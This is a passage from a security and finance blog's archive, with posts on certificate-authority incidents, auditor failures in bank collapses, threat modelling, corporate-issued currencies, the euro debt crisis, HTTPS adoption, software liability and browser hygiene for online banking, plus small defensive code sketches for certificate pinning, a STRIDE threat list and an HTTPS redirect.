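            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                der = tls.getpeercert(binary_form=True)
        return hashlib.sha256(der).hexdigest()

    def pin_ok(host):
        """True if the presented certificate matches a stored pin (or no pin exists)."""
        expected = PINS.get(host)
        if not expected:
            return True                  # no pin recorded: fall back to CA trust alone
        return leaf_fingerprint(host) in expected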

    But what is now clear is that the trend that started in 2011 is confirmed in 2012 - we have 5+ incidents in each year. For many reasons, the CA business has reached a plateau of aggressive attention. It can now consider itself under attack, after 15 or so years of peace.

    Posted by iang at 04:14 PM | Comments (3) | TrackBack

    September 28, 2012

    STOP PRESS! An Auditor has been brought to task for a failed bank!

    In what is stunning news - because we never believed it would happen - it transpires that, as reported by The Economist:

    In 2002 the Sarbanes-Oxley act limited what kind of non-audit services an American accounting firm can offer to an audit client. But contrary to what many people believe, it did not forbid all of them. In its last full proxy statement before being bought by JPMorgan, Bear Stearns reported paying Deloitte in 2006 not only $20.8m for audit, but $6.3m for other services. The perception that auditors and clients are hand-in-glove, fair or not, is a reason why shareholders of Bear Stearns sued Deloitte along with the defunct bank. (JPMorgan and Deloitte settled in June. Deloitte paid out $20m, denying any wrongdoing.)

    So, when anybody ever asks "did any auditor get taken to task over a failed bank?" the answer is YES. In the global financial crisis, Mark 1, which cost the world a trillion or two, we can now authoritatively state that Deloitte paid out $20m and denied any wrongdoing.

    In related news, the same article reports:

    IT IS hardly news that the “Big Four” accounting firms get bigger nearly every year. But where they are growing says a lot about what they will look like in a decade, and the prospects worry some regulators and lawmakers. On September 19th Deloitte Touche Tohmatsu was the first to report revenues for its 2012 fiscal year, crowing of 8.6% growth, to $31.3 billion. Ernst & Young, PwC and KPMG will soon report their revenues (as private firms the Big Four choose not to report profits).

    OK, does anyone know what the margin on audit & consulting is typically thought to be?

    Posted by iang at 07:53 AM | Comments (5) | TrackBack

    April 10, 2012

    What's the takeaway on Audit?

    OK, so I edited the title, to fit in with an old Audit cycle I penned a while ago (I, II, III, IV, V, VI, VII).

    Here's the full unedited quote from Avivah Litan, who comments on the latest 1.5m credit card breach in US of A:

    What’s the takeaway on PCI? The same one that’s been around for years. Passing a PCI compliance audit does not mean your systems are secure. Focus on security and not on passing the audit.

    Just a little emphasis, so audit me! PCI is that audit imposed by the credit card industry on processors. It's widely criticised. I imagine it does the same thing as most mandated and controlled audits - sets a very low bar, one low enough to let everyone pass if they've got the money to pay to enter the race.

    For those wondering what happened to the audits of Global Payments, DigiNotar, Heartland, and hell, let's invite a few old friends to the party: MFGlobal, AIG, Lehman Brothers, Northern Rock, Greece PLC, the Japanese Nuclear Industry disaster recovery team and the Federal Reserve.... well, here's Avivah's hint:

    In the meantime, Global Payments who was PCI compliant at the time of their breach is no longer PCI compliant – and was delisted by Visa – yet they continue to process payments.

    That's a relief! So PCI comes with a handy kill-switch. If something goes wrong, we kill your audit :)

    Problem solved. I wonder what the price of the kill-switch is, without the audit?

    Posted by iang at 06:41 PM | Comments (2) | TrackBack

    March 17, 2012

    Fans of Threat Modelling reach for their guns ... but can they afford the bullets?

    Over on New School, my threat-modelling-is-for-birds rant last month went down like a lead balloon.

    Now, I'm gonna take the rap for this one. I was so happy to have finally found the nexus between threat modelling and security failure that has been bugging me for a decade, that I thought everyone else would get it in a blog post. No such luck, schmuck. Have another go!

    Closest pin to the donkey tail went to David, who said:

    Threat modeling is yet another input into an over all risk analysis.

    Right. And that's the point. Threat modelling by itself is incomplete. What's the missing bit? The business. Look at this gfx, risk'd off some site. This is the emerging ISO 31000 risk management typology (?) in slightly cut-down form.

    The business is the 'context', as shown by the red arrow. When you get into "the biz" you discover it's a place of its own, a life, a space, an entire world. More pointedly, the biz provides you with (a) the requirements and (b) a list of validated threats - e.g., its own history of threats already dealt with.

    The biz provides the foundation and context for all we do - we protect the business, without which we have no business meddling.

    (Modelling distraction: As with the graphic, the source of requirements is often painted at the top of the diagram, and requirements-driven architecture is typically called top-down. Alternatively and depending on your contextual model, we can draw it as a structural model: our art or science can sit on top of the business. We are not lifting ourselves up by our bootstraps; we are lifting the business to greater capabilities and margins. So it may be rational and accurate to call the business a bottom-up input.)

    Either way, business is a mess, and one we can't avoid. We have to dive in and absorb, and in our art we filter out the essence of the problem from the business into a language we call 'requirements'.

    Then, the "old model" of threat modelling is somewhere in that middle box. For sake of this post, turn the word risk into threat. Follow the blue arrow, it's somewhere in there.

    The point then of threat modelling is that it is precisely the opposite of what you'd expect: it's perfect. In more particular words, it lives without a context. Threat modelling proceeds happily without requirements that are grounded in a business problem or a customer base, without a connection to the real world.

    Threat modelling is perfect by definition, which we achieve by cutting the scope off at the knees.

    Bring in the business and we get real messy. Human, tragic. And out of the primordial swamp of our neighbors crawl the living, breathing, propagating requirements that make a real demand on us - survival, economy, sex, war, whatever it is that real people ask us for.

    Adam talks about Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege... which sounds perfect. And I'd love to play the game :)
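    To show how mechanical the game is, here's a toy sketch (the asset names are invented): cross the STRIDE categories with a list of assets and out pops a tidy threat list, with nothing anywhere obliging us to ask what the business actually needs protected, or why.

    # Toy STRIDE enumeration. Asset names are invented; the point is how
    # mechanically 'perfect' the exercise is without any business context.
    STRIDE = [
        "Spoofing", "Tampering", "Repudiation",
        "Information Disclosure", "Denial of Service", "Elevation of Privilege",
    ]

    assets = ["login form", "payment API", "audit log"]   # hypothetical system

    threats = [(asset, category) for asset in assets for category in STRIDE]

    for asset, category in threats:
        print(f"Threat: {category} against {asset}")
    # 18 tidy threats, and not one word about what the business is for.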

    But real life is these things: insider trading, teenager versus teenager versus parent versus parent, revolutions of colour, DVD sharing, hiding in plain sight, movement tracking of jealous loved ones, don't ask, don't tell, whistleblowing, revenge,...

    This philosophy of business-context-first-and-foremost also explains a lot of other things. Just by way of one example, it gives an essential clue as to why only end-to-end security is worth anything. Application security automatically has a better chance of including the business; point-to-point designs like IPSec, SSL, DNSSec, etc. have no chance. They've already handwaved anything past the relevant nodes into utter obscurity.

    Posted by iang at 05:54 PM | Comments (9) | TrackBack

    February 29, 2012

    Google thought about issuing a currency

    Chris points to:

    Google once considered issuing its own currency, to be called Google Bucks, company Chairman Eric Schmidt said on stage in Barcelona at the Mobile World Congress Tuesday.

    At the end of his keynote speech, Schmidt hit on a wide array of topics in response to audience questions. "We've had various proposals to have our own currency we were going to call Google Bucks," Schmidt said.

    The idea was to implement a "peer-to-peer money" system. However, Google discovered that the concept is illegal in most areas, he said. Governments are typically wary of the potential for money laundering with such proposals. "Ultimately we decided we didn't want to get into that because of these issues," Schmidt said.

    Offered without too much analysis. This confirms what we suspected - that they looked at it and decided not to. Technically, this is a plausible and expected decision that will be echoed by many conventional companies. I would expect Apple to do this too, and Microsoft know this line very well.

    However, we need to understand that this result is intentional: the powers that be want you to think this way. Banks want you to play according to their worldview, and they want you to be scared off their patch. Sometimes, however, they don't tell the whole truth, and as it happens, p2p money is not illegal in the USA or Europe - the largest markets. You are also going to find surprising friends in just about any third world country.

    Still, google did their own homework, and at least they investigated. As a complicated company with many plays, they and they alone must set their strategy. But as we move into GFC-2, with the probability of mass bank nationalisations in order to save the payments systems, one wonders how history will perceive their choice.

    Posted by iang at 06:56 PM | Comments (0) | TrackBack

    January 21, 2012

    the emerging market for corporate issuance of money

    As an aside to the old currency market currently collapsing - in the now universally known movie GFC-2, rolling on your screens right now - some people have commented that perhaps online currencies, LETS and so forth will fill the gap. Unlikely: they won't fill the gap, but they will surge in popularity. From a business perspective, it is then some fun to keep an eye on them. Here's an article on Facebook Credits by George Anders, which is probably the one to watch:

    Facebook’s 27-year-old founder, Mark Zuckerberg, isn’t usually mentioned in the same breath as Ben Bernanke, the 58-year-old head of the Federal Reserve. But Facebook’s early adventures in the money-creating business are going well enough that the central-bank comparison gets tempting.

    Let's be very clear here: the mainstream media and most commentators will have very little clue what this is about. So they will search for easy analogues such as a comparison with national units, leading to specious comparisons of Zuckerberg to Bernanke. Hopeless, complete and utter nonsense, but it makes for easy copy and nobody will call them on it.

    Edward Castronova, a telecommunications professor at Indiana University, is fascinated by the rise of what he calls “wildcat currencies,” such as Facebook Credits. He has been studying the economics of online games and virtual worlds for the better part of a decade. Right now, he calculates, the Facebook Credits ecosystem can’t be any bigger than Barbados’s economy and might be significantly smaller. If the definition of digital goods keeps widening, though, he says, “this could be the start of something big.”

    This is a little less naive and also slightly subtle. Let me re-write it:

    If you believe that Facebook will continue to dominate and hold its market size, and if you believe that they will be able to successfully walk the minefield of self-issued currencies, then the result will be important. In approximate terms, think about PayPal-scaled importance, order of magnitude.

    Note the assumptions there. Facebook have a shot at the title, because they have massive size and uncontested control of their userbase. (Google, Apple, Microsoft could all do the same thing, and in a sense, they already are...)

    The more important assumption is how well they avoid the minefield of self-issued currencies. The problem here is that there are no books on it, no written lore, no academic seat of learning, nothing but the school of hard knocks. To their credit, Facebook have already learnt quite a bit from the errors of their immediate predecessors. Which is no mean feat: historically, self-issuers learn very little from their forebears, and that track record is a good predictor of things to come.

    Of the currency issuers that spring up, 99% are destined to walk on a mine. Worse, they can see the mine in front of them, they successfully aim for it, and walk right onto it with aplomb. No help needed at all. And, with 15 years of observation, I can say that this is quite consistent.

    Why? I think it is because there is a core dichotomy at work here. In order to be a self-issuer you have to be independent enough to not need advice from anyone, which will be familiar to business observers as the entrepreneur-type. Others will call it arrogant, pig-headed, too darned confident for his own good... but I prefer to call it entrepreneurial spirit.

    *But* the issuance of money is something that is typically beyond most people's ken at an academic or knowledge level. Usage of money is something that we all know, and all learnt at age 5 or so. We can all put predictions in at this level, and some players can make good judgements (such as Peter Vodel's Predictions for Facebook Credits in 2012).

    Issuance of money, however, is a completely different thing to usage. It is seriously difficult to research and learn; by way of benchmark, I wrote in 2000 that you need to be quite adept at 7 different disciplines to do online money (what we then called Financial Cryptography). That number was reached after as many years of research on issuance, and nearly that number working in the field full time.

    And, I still got criticised by disciplines that I didn't include.

    Perhaps fairly...

    You can see where I'm heading. The central dichotomy of money issuance, then, is that the self-issuer must be capable both of ignoring advice and of putting together an overwhelming body of knowledge at the same time; which is a disastrous clash, as entrepreneurs are hopeless at blindspots, unknowns, and prior art.

    There is no easy answer to this clash of intellectual challenges. Most people will for example assume that institutions are the way to handle any problem, but that answer is just another minefield:

    If Facebook at some point is willing to reduce its cut of each Credits transaction, this new form of online liquidity may catch the eye of many more merchants and customers. As Castronova observes: “there’s a dynamic here that the Federal Reserve ought to look at.”

    Now, we know that Castronova said that for media interest only, but it is important to understand what really happens with the Central Banks. Part of the answer here is that they already do observe the emerging money market :) They just won't talk to the media or anyone else about it.

    Another part of the answer is that CBs do not know how to issue money either; another dichotomy easily explained by the fact that most CBs manage a money that was created a long time ago, and the story has changed in the telling.

    So, we come to the really difficult question: what to do about it? CBs don't know, so they will definitely keep the stony face up, because their natural reaction to any question is silence.

    But wait! you should be saying. What about the Euro?

    Well, it is true that the Europeans did indeed successfully manage to re-invent the art and issue a new currency. But, did they really know what they were doing? I would put it to you that the Euro is the exception that proves the rule. They may have issued a currency very well, but they failed spectacularly in integrating that currency into the economy.

    Which brings us full circle back to the movie now showing on media tonight and every night: GFC-2.

    Posted by iang at 06:54 PM | Comments (1) | TrackBack

    January 08, 2012

    Why we got GFC-2

    And so it came to pass that, after my aggressive little note on GFC-1's causes found in securitization (I, II, III, IV), I am asked to describe the current, all new with extra whitening Global Financial Crisis - the Remix, or GFC-2 to those who love acronyms and the pleasing rhyme of sequels.

    Or, the 2nd Great Depression, depending on how it pans out. Others have done it better than I, but here is my summary.

    Part 1. In 2000, European countries joined together in the EMU, or European Monetary Union. A side-benefit of this was the Bundesbank's legendary and robust control of inflation and stiff conservative attitude to matters monetary. Which meant other countries more or less got to borrow at the Bundesbank's rates, plus a few BPs (that's basis points, or hundredths of percentage points, for you and me).

    Imagine that?! Italy, who had been perpetually broke under the old Lira, could now borrow at not 6 or 7% but something like 3%. Of course, she packed her credit card and went to town, as 3% on the CC meant she could buy twice as much stuff, for the same regular monthly payments. So did Ireland, Portugal, Greece and Spain. Everyone in the EMU, really.

    The problem was, they still had to pay it back. Half the interest with the same serviceable monthly credit card bill means you can borrow twice as much. Leverage! It also means that if the rates move against you, you're in it twice as deep.
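    A back-of-the-envelope sketch of that arithmetic (the 3% and 7% rates are the illustrative figures from above; the interest budget is invented):

    # With the same annual interest bill, how much debt can you carry at 3%
    # versus 7%? Interest-only, which is roughly how sovereigns roll debt over.
    def affordable_principal(annual_interest_budget, rate):
        """Principal whose interest-only service fits within the annual budget."""
        return annual_interest_budget / rate

    budget = 30.0                          # invented: 30 (billion) a year for interest
    for rate in (0.07, 0.03):
        principal = affordable_principal(budget, rate)
        print(f"at {rate:.0%}: can carry about {principal:.0f} (billion) of debt")
    # at 7%: ~429; at 3%: 1000 -- more than double the debt for the same bill,
    # and the same squeeze in reverse when rates snap back up.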

    And the rates, they did surely move. For this we can blame GFC-1 which put the heebie-jeebies into the market and caused them to re-evaluate the situation. And, lo and behold, the European Monetary Union was revealed as no more than a party trick because Greece was still Greece, banks were still banks, debt was still debt, and the implicit backing from the Bundesbank was ... not actually there! Or the ECB, which by charter isn't allowed to lend to governments nor back up their foolish use of the credit card.

    Bang! Rates moved up to the old 6 or 7%, and Greece was bankrupt.

    Now we get to Part 2. It would have been fine if it had stopped there, because Greece could just default. But the debt was held by (owed to) ... the banks. Greece bankrupt ==> banks bankrupt. Not just the Greek ones, and not even mainly them, but all of them: financing governments is a world-wide business, and the balance sheets of the banks, post-GFC-1 and in a non-rising market, are anything but 'balanced.' Consider this as Part 0.

    Now stir in a few more languages, a little contagion, and we're talking *everyone*. To a good degree of approximation, if Greece defaults, USA's banking system goes nose deep in it too.

    So we move from the countries, now the least of our problems because they can simply default ... to the banks. Or, more holistically, the entire banking system. Is bankrupt.

    In its current form today, there is the knowledge that the banks cannot deal with the least hiccup. Every bank knows this, knows that if another bank defaults on a big loan, they're in trouble. So every bank pulls its punches, liquidity dries up, and credit stops flowing ... to businesses, and the economy hits a brick wall. Internationally.

    In other words, the problem isn't that countries are bankrupt, it is that they are not allowed to go bankrupt (clues 1, 2).

    We saw something similar in the Asian Financial Crisis, where countries were forced to accept IMF loans ... which paid out the banks. Once the banks had got their loans paid off, they walked, and the countries failed (because of course they couldn't pay back the loans). Problem solved.

    This time however there is no IMF, no external saviour for the banking system, because we are it, and we are already bankrupt.

    Well, there. This is as short as I can get the essentials. We need scholars like Kevin Dowd or John Maynard Keynes, those whose writing is so clear and precise as to be intellectual wonders in their own lifetimes. And, they will emerge in time to better lay down the story - the next 20 years are going to be a new halcyon age of economics. So much to study, so much new raw data. Pity they'll all be starving.

    Posted by iang at 07:12 AM | Comments (2) | TrackBack

    November 28, 2011

    Audit redux.2 - and what happened to the missing MF Global client funds?

    As we all know by now, MF Global crashed with some billions of losses, filing for bankruptcy on 31st October. James Turk wonders aloud:

    First of all investors should be concerned because everything is so inter-connected today. People call it contagion and this contagion is real because the MF Global bankruptcy is going to have a knock on effect, just like Lehman Brothers had a knock on effect.”

    The point being that we know there is a big collapse coming, but we don't know what it will be that triggers it. James is making the broad point that a firm collapsing on the west side of the Atlantic could cause collapse in Europe. But wait, there's more:

    So the contagion is the first reason for concern. The second reason for concern is it’s taking so long for them to find this so called missing money, which I find shocking. It’s been three weeks now since the MF Global bankruptcy was declared and they started talking about $600 million of missing funds.

    So I’m not too surprised that now they are talking about $1.2 billion of missing customer funds. I think they are just trying to delay the inevitable as to how bad the situation at MF Global really is.

    And more! Chris points to an article by Bloomberg / Jonathan Weil:

    This week the trustee for the liquidation of its U.S. brokerage unit said as much as $1.2 billion of customer money is missing, maybe more. Those deposits should have been kept segregated from the company’s funds. By all indications, they weren’t.

    Jonathan zeroes in on the heart of the matter:

    Six months ago the accounting firm PricewaterhouseCoopers LLP said MF Global Holdings Ltd. and its units “maintained, in all material respects, effective internal control over financial reporting as of March 31, 2011.” A lot of people who relied on that opinion lost a ton of money.

    So when I asked:

    Let's check the record: did any audit since Sarbanes-Oxley pick up any of the problems seen in the last 18 months to do with the financial crisis?

    we now know that PricewaterhouseCoopers LLP will not be stepping up to the podium with MF Global! Jonathan echoes some of the questions I asked:

    What’s the point of having auditors do reports like this? And are they worth the cost? It’s getting harder to answer those questions in a way the accounting profession would favor.

    But now that we have a more cohesive case study to pick through, some clues are emerging:

    “Their books are a disaster,” Scott O’Malia, a commissioner at the Commodity Futures Trading Commission, told the Wall Street Journal in an interview two weeks ago. The newspaper also quoted Thomas Peterffy, CEO of Interactive Brokers Group Inc., saying: “I always knew the records were in shambles, but I didn’t know to what extent.” Interactive Brokers backed out of a potential deal to buy MF last month after finding discrepancies in its financial reports.

    That's a tough start for PricewaterhouseCoopers LLP. Then:

    For fiscal 2007, MF Global paid Pricewaterhouse $17.1 million in audit fees. By fiscal 2011, that had fallen to $10.9 million, even as warning signs about MF’s internal controls were surfacing publicly.

    In 2007, MF and one of its executives paid a combined $77 million to settle CFTC allegations of mishandling hedge-fund clients’ accounts, as well as supervisory and record-keeping violations. In 2009, the commission fined MF $10 million for four instances of risk-supervision failures, including one that resulted in $141 million of trading losses on wheat futures. Suffice it to say, Pricewaterhouse should have been on high alert.

    On top of that, Pricewaterhouse’s main regulator, the Public Company Accounting Oversight Board, released a nasty report this week on the firm’s audit performance. The agency cited deficiencies in 28 audits, out of 75 that it inspected last year. The tally included 13 clients where the board said the firm had botched its internal-control audits. The report didn’t name the companies. One of them could have been MF, for all we know.

    In a response letter to the board, Pricewaterhouse’s U.S. chairman, Bob Moritz, and the head of its U.S. audit practice, Tim Ryan, said the firm is taking steps to improve its audit quality.

    Ha! Jonathan asks the pointed question:

    The point of having a report by an independent auditor is to assure the public that what a company says is true. Yet if the reports aren’t reliable, they’re worse than worthless, because they sucker the public with false promises. Maybe, just maybe, we should stop requiring them altogether.

    Exactly. This was what I was laying out for the reader in my Audit cycle. But I was doing it from observation and logic, not from knowing about any particular episode. One however was expected to follow from the other...

    The Audit brand depletes. Certainly time to start asking hard questions. Is there value in using a big 4 auditor? Could a firm get by on a more local operation? Are there better ways?

    And, what does a big N auditor do in the new world? Well, here's one suggestion: take the bull by the horns and start laying out the truth! KPMG's new Chairman seems to be keen to add on to last week's revelation with some more:

    KPMG International LLP’s global chairman, Michael Andrew, said fraud was evident at Olympus Corp. (7733) and his firm met all legal obligations to pass on information related to Olympus’s 2008 acquisition of Gyrus Group Ltd. before it was replaced as the camera maker’s auditor.

    “We were displaced as a result of doing our job,” Andrew told reporters at the Foreign Correspondents’ Club in Hong Kong today. “It’s pretty evident to me there was very, very significant fraud and that a number of parties had been complicit.”

    Now, if I was a big N auditor, that's exactly what I'd do. Break the cone of silence and start revealing the dirt. We can't possibly make things any worse for audit, so let's shake things up. Go, Andrew.

    Posted by iang at 03:51 PM | Comments (1) | TrackBack

    October 23, 2011

    HTTPS everywhere: Google, we salute you!

    Google radically expanded Tuesday its use of bank-level security that prevents Wi-Fi hackers and rogue ISPs from spying on your searches.

    Starting Tuesday, logged-in Google users searching from Google’s homepage will be using https://google.com, not http://google.com — even if they simply type google.com into their browsers. The change to encrypted search will happen over several weeks, the company said in a blog post Tuesday.


    We have known for a long time that the answer to web insecurity is this: There is only one mode, and it is secure.

    (I use the royal we here!)

    This is evident in breaches led by phishing, as the users can't see the difference between HTTP and HTTPS. The only solution at several levels is to get rid of HTTP. Entirely!

    Simply put, we need SSL everywhere.
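    Operationally, "get rid of HTTP" means one policy: answer every plain-HTTP request with a permanent redirect to its HTTPS equivalent, and serve the real site only over TLS. A minimal sketch (the fallback hostname and the port are placeholders):

    # Minimal sketch: a plain-HTTP listener whose only job is to redirect
    # every request to the HTTPS version of the same URL.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    class RedirectToHTTPS(BaseHTTPRequestHandler):
        def do_GET(self):
            host = self.headers.get("Host", "example.com")   # placeholder fallback
            self.send_response(301)                          # permanent redirect
            self.send_header("Location", f"https://{host}{self.path}")
            self.end_headers()

        do_HEAD = do_GET   # treat HEAD requests the same way

    if __name__ == "__main__":
        # port 8080 for the example; in real life this sits on port 80
        HTTPServer(("", 8080), RedirectToHTTPS).serve_forever()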

    Google are seemingly the only big corporate that have understood and taken this message to heart.

    Google has been a leader in adding SSL support to cloud services. Gmail is now encrypted by default, as is the company’s new social network, Google+. Facebook and Microsoft’s Hotmail make SSL an option a user must choose, while Yahoo Mail has no encryption option, beyond its initial sign-in screen.

    EFF and CAcert are small organisations that are doing it as and when we can... Bit by bit, security-conscious organisations are migrating all of their sites to SSL and HTTPS.

    It will probably take a decade. Might as well start now -- where's your organisation's commitment to security? Amazon, Twitter, Yahoo? Facebook!

    Posted by iang at 05:24 AM | Comments (2) | TrackBack

    August 17, 2011

    How Liability is going to kill what little is left of Internet security…

    Long term readers will know that I have often written of the failure of the browser vendors to provide effective security against phishing. I long ago predicted that nothing would change until the class-action lawsuits came. Now signs are appearing that this is coming to pass:

    That's changing rapidly. Recently, Sony faced a class action lawsuit for losing the private information of millions of users. And this week, it was reported that Dropbox is already being sued for a recent security breach of its own.

    It's too early to know if these particular lawsuits will get anywhere, but they're part of a growing trend. As online services become an ever more important part of the American economy, the companies that create them increasingly find that security problems are hitting them where it really hurts: the bottom line.

    See also the spate of lawsuits against banks over losses; although it isn't the banks' direct fault, they are complicit in pushing weak security models, and a law will come to make them completely liable. Speaking of laws:

    Computer security has also been an area of increasing activity for the Federal Trade Commission. In mid-June, FTC commissioner Edith Ramirez testified to Congress about her agency's efforts to get companies to beef up their online security. In addition to enforcing specific rules for the financial industry, the FTC has asserted authority over any company that makes "false or misleading data security claims" or causes harm to consumers by failing to take "reasonable security measures." Ramirez described two recent settlements with companies whose security vulnerabilities had allowed hackers to obtain sensitive customer data. Among other remedies, those firms have agreed to submit to independent security audits for the next 20 years.

    Skip over the sad joke at the end. Timothy B. Lee of Ars Technica, author of those words, did more than just recycle other stories; he actually did some digging:

    [Ars Technica asked] Alex Halderman, a computer science professor at the University of Michigan, to help us evaluate these options. He argued that consumer choice by itself is unlikely to produce secure software. Most consumers aren't equipped to tell whether a company's security claims are "snake oil or actually have some meat behind them." Security problems therefore tend not to become evident until it's too late.

    But he argued the most obvious regulatory approach—direct government regulation of software security practices—was also unlikely to work. A federal agency like the FTC has neither the expertise nor the manpower to thoroughly audit the software of thousands of private companies. Moreover, "we don't have really widely regarded, well-established best practices," Halderman said. "Especially from the outside, it's difficult to look at a problem and determine whether it was truly negligent or just the kind of natural errors that happen in every software project."

    And when an agency found flaws, he said, it would have trouble figuring out how urgent they were. Private companies might be forced to spend a lot of time fixing trivial flaws while more serious problems get overlooked.

    (Buyers don't know. Sellers don't know.)

    So what about liability? I, like others, have recognised that liability will eventually arise:

    This is a key advantage of using liability as the centerpiece of security policy. By making companies financially responsible for the actual harms caused by security failures, lawsuits give management a strong motivation to take security seriously without requiring the government to directly measure and penalize security problems. Sony allegedly laid off security personnel ahead of this year's attacks. Presumably it thought this would be a cost-saving move; a big class action lawsuit could ensure that other companies don't repeat that mistake in future.

    But:

    Still, Halderman warned that too much litigation could cause companies to become excessively security-conscious. Software developers always face a trade-off between security and other priorities like cost and time to market. Forcing companies to devote too much effort to security can be as harmful as devoting too little. So policymakers shouldn't focus exclusively on liability, he said.

    Actually, it's far worse. Figure out some problem, and go to a company and mention that this issue exists. The company will ignore you. Mention liability, and the company will immediately close ranks and deny-by-silence any potential liability. Here's a variation written up close by concerning privacy laws:

    ...For everything else, the only rule for companies is just “don’t lie about what you’re doing with data.”

    The Federal Trade Commission enforces this prohibition, and does a pretty good job with this limited authority, but risk-averse lawyers have figured out that the best way to not violate this rule is to not make explicit privacy promises at all. For this reason, corporate privacy policies tend to be legalistic and vague, reserving rights to use, sell, or share your information while not really describing the company’s practices. Consumers who want to find out what’s happening to their information often cannot, since current law actually incentivizes companies not to make concrete disclosures.

    Likewise with liability: if a problem is known of beforehand, it is far easier to slap on a claim of gross negligence. Which means, in simple layman's terms: triple damages. Hence, companies have a powerful incentive to ignore liability completely. As above with privacy, companies are incentivised not to acknowledge the problem; and so it comes to pass with security in general.

    Try it. Figure out some user-killer problem in some sector, and go talk to your favourite vendor. Mention damages, liability, etc, and up go the shutters. No word, no response, no acknowledgement. And so, the problem(s) will never get fixed. The fear of liabilities is greater than the fear of users, competitors, change, even fear itself.

    Which pretty much guarantees a class-action lawsuit one day. And the problem still won't be fixed, as all thoughts are turned to denial.

    So what to do? Halderman drifts in the same direction as I've commented:

    Halderman argued that secure software tends to come from companies that have a culture of taking security seriously. But it's hard to mandate, or even to measure, "security consciousness" from outside a company. A regulatory agency can force a company to go through the motions of beefing up its security, but it's not likely to be effective unless management's heart is in it.

    It's completely meaningless to mandate, which is the flaw behind the joke of audit. But it is possible to measure. Here's an attempt by yours truly.

    What's not yet clear is how to incentivise companies to pursue that lofty goal, even if we all agree it is good.

    Posted by iang at 11:21 AM | Comments (1) | TrackBack

    March 30, 2011

    Revising Top Tip #2 - Use another browser!

    It's been a long time since I wrote up my Security Top Tips, and things have changed a bit since then. Here's an update. (You can see the top tips about half way down on the right menu block of the front page.)

    Since then, browsing threats have got a fair bit worse. Although browsers have done some work to improve things, their overall efforts have not really resulted in any impact on the threats. Worse, we are now seeing MITBs (man-in-the-browser attacks) being experimented with, and many more attackers getting in on the act.

    To cope with this heightened risk to our personal node, I experimented a lot with using private browsing, cache clearing, separate accounts and so forth, and finally hit on a fairly easy method: Use another browser.

    That is, use something other than the browser that one uses for browsing. I use Firefox for general stuff, and for a long time I've been worried that it doesn't really do enough in the battle for my user security. Safari is also loaded on my machine (thanks to Top Tip #1). I don't really like using it, as its interface is a little bit weaker than Firefox (especially the SSL visibility) ... but in this role it does very well.

    So for some time now, for all my online banking and similar usage, I have been using Safari. These are my actions:

    • I start Safari up
    • click on Safari / Private Browsing
    • use google or memory to find the bank
    • inspect the URL and head in.
    • After my banking session I shut down Safari.

    I don't use bookmarks, because that's an easy place for a trojan to look (I'm not entirely sure of that technique, but it seems like an obvious hint).

    "Use another browser" creates an ideal barrier between a browsing browser and a security browser, and Safari works pretty well in that role. It's like an air gap, or an app gap, if you like. If you are on Microsoft, you could do the same thing using IE and Firefox, or you could download Chrome.

    I've also tested it on my family ... and it is by far the easiest thing to tell them. They get it! Assume your browsing habits are risky, and don't infect your banking. This works well because my family share their computers with kids, and the kids have all been instructed not to use Safari. They get it too! They don't follow the logic, but they do follow the tool name.

    What says the popular vote? Try it and let me know. I'd be interested to hear of any cross-browser threats, as well :)


    A couple of footnotes: Firstly, belated apologies to anyone who's been tricked by the old Top Tip - it took far too long to write this one up. Secondly, I've dropped the Petnames / Trustbar Top Tip because it isn't really suitable for mass users (e.g., my mother), and these fine security tools never really attracted the attention of the browser-powers-that-be, so they died away as hobby efforts tend to do. Maybe the replacement would be "Turn on Private Browsing"?

    Posted by iang at 01:54 AM | Comments (8) | TrackBack

    January 28, 2011

    The Zippo Lighter theory of the financial crisis (or, who do we want to blame?)

    The Economist summarises who the Financial Crisis Inquiry Commission of USA's Congress would like to blame in three tranches. For the Democrats, it's the financial industry and the de-regulation-mad Republicans:

    The main report, endorsed by the Democrats, points to a broad swathe of failures but pins much of the blame on the financial industry, be it greed and sloppy risk management at banks, the predations of mortgage brokers, the spinelessness of ratings agencies or the explosive growth of securitisation and credit-default swaps. To the extent that politicians are to blame, it is for overseeing a quarter-century of deregulation that allowed Wall Street to run riot.

    For the Republicans:

    A dissenting report written by three of the Republicans could be characterised as the Murder on the Orient Express verdict: they all did it. Politicians, regulators, bankers and homebuyers alike grew too relaxed about leverage, helping to create a perfect financial storm. This version stresses broad economic dynamics, placing less emphasis on Wall Street villainy and deregulation than the main report does.

    Finally, one lone dissenter:

    A firmer (and, at 43,000 words, longer) rebuttal of the report by the fourth Republican, Peter Wallison, puts the blame squarely on government policies aimed at increasing home ownership among the poor. Mr Wallison argues that the pursuit of affordable-housing goals by government and quasi-government agencies, including Fannie Mae and Freddie Mac, caused a drastic decline in loan-underwriting standards. Over 19m of the 27m subprime and other risky mortgages created in the years leading up to the crisis were bought or guaranteed by these agencies, he reckons. These were "not a cigarette butt being dropped in a tinder-dry forest" but "a gasoline truck exploding" in the middle of one, Mr Wallison says.

    Yessss..... That's getting closer. Not exactly a gasoline truck, as that would need but one unfortunate spark. More like several containers, loaded with 19m fully-loaded zippo lighters, driven into the forest of housing finance one hot dry summer, and distributed to as many needy dwellers as could be found.

    Now, who would have driven that truck, and why? Who would have proposed it to the politicians? Ask these questions, and we're almost there.

    Posted by iang at 05:39 AM | Comments (3) | TrackBack

    November 21, 2010

    What banking is. (Essential for predicting the end of finance as we know it.)

    To understand what's happening today in the economy, we have to understand what banking is, and by that, I mean really understand how it works.

    This time it's personal, right? Let's start with what Niall Ferguson says about banking:

    To understand why we have come so close to a rerun of the 1930s, we need to begin at the beginning, with banks and the money they make. From the Middle Ages until the mid-20th century, most banks made their money by maximizing the difference between the costs of their liabilities (payments to depositors) and the earnings on their assets (interest and commissions on loans). Some banks also made money by financing trade, discounting the commercial bills issued by merchants. Others issued and traded bonds and stocks, or dealt in commodities (especially precious metals). But the core business of banking was simple. It consisted, as the third Lord Rothschild pithily put it, "essentially of facilitating the movement of money from Point A, where it is, to Point B, where it is needed."

    As good and fruitful as the good Prof's comments are, we need more. Here's what banking really is:

    Banking is borrowing from the public on demand, and lending those demand deposits to the public at term.

    Sounds simple, right? No, it's not. Every one of those words is critically important, and change one or two of them and we've broken it. Let's walk it through:

    Banking is borrowing from the public ..., and lending ... to the public.

    Both from the public, and to the public. The public at both ends of banking is essential to ensure a diversification effect (A to B), a facilitation effect (bank as intermediary), and ultimately a public policy interest in regulation (the central bank). If one of those conditions isn't met, if one of those parties isn't "the public", then: it's not banking. For example:

